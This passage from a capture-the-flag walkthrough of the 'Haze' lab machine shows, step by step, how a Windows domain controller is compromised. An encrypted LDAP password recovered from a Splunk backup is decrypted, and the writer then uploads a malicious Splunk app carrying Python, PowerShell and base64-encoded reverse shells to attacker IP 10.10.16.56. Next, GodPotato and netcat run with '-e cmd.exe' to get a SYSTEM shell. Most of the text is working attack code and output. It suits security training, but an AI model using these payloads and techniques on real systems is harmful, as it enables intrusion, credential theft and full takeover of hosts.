+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
However, edward.martin is part of Backup_Reviewers group:
*Evil-WinRM* PS C:\Users\edward.martin\Documents> net user edward.martin
User name edward.martin
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/31/2025 9:17:28 AM
Password expires Never
Password changeable 4/1/2025 9:17:28 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/31/2025 9:12:11 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Backup_Reviewers *Domain Users
The command completed successfully.
and this user can list C:\Backups directory:
*Evil-WinRM* PS C:\Users\edward.martin\Documents> dir C:\Backups
Directory: C:\Backups
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/5/2025 12:33 AM Splunk
As we discovered and confirm with icacls, Backup_Reviewers group can read this directory:
*Evil-WinRM* PS C:\Users\edward.martin\Documents> icacls C:\Backups
C:\Backups HAZE\Backup_Reviewers:(OI)(CI)(RX)
CREATOR OWNER:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
At C:\Backups\Splunk folder, we have a .zip file which seems to be a backup:
*Evil-WinRM* PS C:\Users\edward.martin\Documents> dir C:\Backups\Splunk
Directory: C:\Backups\Splunk
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/6/2024 3:22 PM 27445566 splunk_backup_2024-08-06.zip
Download it into our attacker machine using download function from evil-winrm (go for a coffee, it takes some time):
*Evil-WinRM* PS C:\Users\edward.martin\Documents> cd C:\Backups\Splunk
*Evil-WinRM* PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zip
Info: Downloading C:\Backups\Splunk\splunk_backup_2024-08-06.zip to splunk_backup_2024-08-06.zip
Info: Download successful!
Then, unzip this file in our attacker machine:
❯ unzip splunk_backup_2024-08-06.zip
Archive: splunk_backup_2024-08-06.zip
creating: Splunk/
creating: Splunk/bin/
<SNIP>
It extracts all its content into a directory called Splunk. If we remember, authentication.conf had the credentials for the first user we met. Let’s check this file in this backup:
❯ find ./Splunk -name '*authentication.conf' -type f 2>/dev/null
./Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
./Splunk/var/run/splunk/confsnapshot/baseline_default/system/default/authentication.conf
./Splunk/etc/system/default/authentication.conf
The first file in the list shows something similar as we discovered initially:
❯ cat ./Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP%
It’s a new encrypted password for alexander.green user (which we can confirm with Bloodhound that exists in the domain).
Similar as we decrypted the password for paul.taylor with splunksecrets, decrypt this password. But first we need the splunk.secret as well:
❯ find ./Splunk -name '*splunk.secret' -type f 2>/dev/null
./Splunk/etc/auth/splunk.secret
Use the secret in this file to decrypt the password:
❯ splunksecrets splunk-legacy-decrypt -S ./Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
Sp1unkadmin@2k24
We got a new password: Sp1unkadmin@2k24.
We can go back to Splunk panel running at http://haze.htb:8000 in a web browser and try with credentials admin:Sp1unkadmin@2k24. They work. We are in:
We can try to load a malicious module to send us a reverse shell. For this purpose, we could use files at this repository. First, we need to clone it and edit files at reverse_shell_splunk/bin directory. Change reverse_shell_splunk/bin/rev.py from:
import sys,socket,os,pty
ip="attacker-ip-here"
port="attacker port here"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
to:
import sys,socket,os,pty
ip="10.10.16.56" # we have added our attacker IP
port="443" # we have added our listening port
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
Where 10.10.16.56 is our attacker IP and 443 the port we will start listening with netcat.
Also, change the file reverse_shell_splunk/bin/run.ps1 (which is just the oneliner file from Nishang)
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetStream();[byte[`$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
to:
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.56',443);$stream = $client.GetStream();[byte[`$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Where we have added our attacker IP address and listening port as well.
Finally, also change reverse_shell_splunk/bin/run.bat to:
@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQA2ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
Exit
where we have passed a PowerShell #3 (Base64) payload from https://www.revshells.com/.
Python script don’t be executed, whereas .bat and .ps1 files probably might be executed since the target is a Windows machine. If we don’t know which one is, I recommend to edit those three files as we have just done.Once done, follow the steps from the repository and compress the file using tar:
❯ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
reverse_shell_splunk/
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/bin/run.bat
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf
and rename this file changing its extension from .tgz to .spl:
❯ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
Then, at Splunk panel click on Manage at the top-left side:
Click on Install app from file at the top-right side:
Start a listener with netcat (along with rlwrap) in our attacker machine on port 443 and, back to the Splunk page, click on Browse and select our reverse_shell_splunk.spl file. We get a shell as alexander.green user:
❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.56] from (UNKNOWN) [10.129.234.37] 58662
whoami
haze\alexander.green
This user has SeImpersonatePrivilege privilege enabled:
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We can use this privilege to escalate privileges.
We can upload a netcat binary for Windows and a tool to abuse SeImpersonatePrivilege such as GodPotato (which can be downloaded from its Github repository). For this, we use our previous session with edward.martin and upload those files to the victim machine. In my case, I like to upload them to any of the directories at UltimateAppLockerByPassList. Before uploading netcat and GodPotato, this last tool has different binaries for different Microsoft .NET versions. We can check which Microsoft .NET version has the victim machine checking its registries:
*Evil-WinRM* PS C:\Users\edward.martin\Documents> reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0
We get v4.0 for Microsoft .NET. Therefore, we can download this pre-compiled GodPotato binary for that version.
Once downloaded in our attacker machine, upload netcat binary and GodPotato executable using edward.martin session with evil-winrm functions:
**Evil-WinRM* PS C:\Users\edward.martin\Documents> upload nc64.exe C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe
<SNIP>
*Evil-WinRM* PS C:\Users\edward.martin\Documents> upload GodPotato-NET4.exe C:\\Windows\\System32\\spool\\drivers\\color\\GodPotato.exe
<SNIP>
*Evil-WinRM* PS C:\Users\edward.martin\Documents> dir C:\Windows\System32\spool\drivers\color
Directory: C:\Windows\System32\spool\drivers\color
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 1:14 AM 1058 D50.camp
-a---- 5/8/2021 1:14 AM 1079 D65.camp
-a---- 3/31/2025 10:19 PM 57344 GodPotato.exe
-a---- 5/8/2021 1:14 AM 797 Graphics.gmmp
-a---- 5/8/2021 1:14 AM 838 MediaSim.gmmp
-a---- 3/31/2025 10:19 PM 45272 nc64.exe
<SNIP>
Finally, at alexander.green session, abuse SeImpersonatePrivilege with the uploaded GodPotato binary. Use it to execute a command with CMD as nt authority/system, which in this case will be to execute the uploaded netcat binary to send us a reverse shell as this privileged user. Start a listener with netcat on port 443 in another terminal. Finally, as alexander.green user we execute:
PS C:\Windows\system32> C:\Windows\System32\spool\drivers\color\GodPotato.exe -cmd "C:\Windows\System32\cmd.exe /c C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.16.56 443 -e cmd.exe"
We get a shell as nt authority/system user and we can grab the flag:
❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.56] from (UNKNOWN) [10.129.104.62] 55728
Microsoft Windows [Version 10.0.20348.3328]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
2a052**************************
~Happy Hacking.